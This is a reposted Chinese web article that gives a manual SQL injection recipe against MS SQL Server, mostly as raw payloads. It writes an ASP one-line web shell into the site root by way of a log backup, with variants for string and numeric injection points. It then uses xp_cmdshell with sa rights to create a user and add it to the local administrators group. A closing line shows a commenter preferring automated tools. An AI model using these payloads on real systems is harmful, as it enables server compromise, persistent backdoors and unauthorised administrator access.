手工实现差异备份的步骤字符型:1、恢复当前库;alterdatabase当前库setRECOVERYFULL--2、建表cmd;createtablecmd(aimage)--3、备份当前库到D:cmd1;backuplog当前库todisk='D:cmd1'withinit--4、插入一句话代码到创建的表cmd;insertintocmd(a)values('<%%25**ecute(request("a"))%%25>')-- 5、备份一句话代码到站点根目录;backuplog当前库todisk='D:www_weboct.asp'--6、完成;droptable创建的表--数字型1、恢复当前库';alterdatabase当前库setRECOVERYFULL--2、创建表cmd';createtablecmd(aimage)--3、备份当前库到D:cmd1';backuplog当前库todisk='D:cmd1'withinit--4、插入一句话代码到创建的表cmd';insertintocmd(a)values('<%%25**ecute(reque
字符型:
1、恢复当前库
;alter database 当前库 set RECOVERY FULL--
2、建表cmd
;create table cmd (a image)--
3、备份当前库到D:cmd1
;backup log 当前库 to disk = 'D:cmd1' with init--
4、插入一句话代码到创建的表cmd
;insert into cmd (a) values ('<%%25**ecute(request("a"))%%25>')--
5、备份一句话代码到站点根目录
;backup log 当前库 to disk = 'D:www_weboct.asp'--
6、完成
;drop table 创建的表--
数字型
1、恢复当前库
';alter database 当前库 set RECOVERY FULL--
2、创建表cmd
';create table cmd (a image)--
3、备份当前库到D:cmd1
';backup log 当前库 to disk = 'D:cmd1' with init--
4、插入一句话代码到创建的表cmd
';insert into cmd (a) values ('<%%25**ecute(request("a"))%%25>')--
5、备份一句话代码到站点根目录
';backup log 当前库 to disk = 'D:www_weboct.asp'--
6、完成
';drop table 创建的表--
sa权限创建管理员用户
1、判断是否有注入;and 1=1 ;and 1=2
;and user_name()='dbo' 判断当前系统的连接用户是不是sa
2、添加系统的管理员
;exec master.dbo.xp_cmdshell 'net user wk wk90/add';--
;exec master.dbo.xp_cmdshell 'net localgroup administrators wk /add';--
逍遥复仇:有工具我是一定不会手工的,麻烦。
声明:本文内容来源自网络,文字、图片等素材版权属于原作者,平台转载素材出于传递更多信息,文章内容仅供参考与学习,切勿作为商业目的使用。如果侵害了您的合法权益,请您及时与我们联系,我们会在第一时间进行处理!我们尊重版权,也致力于保护版权,站搜网感谢您的分享!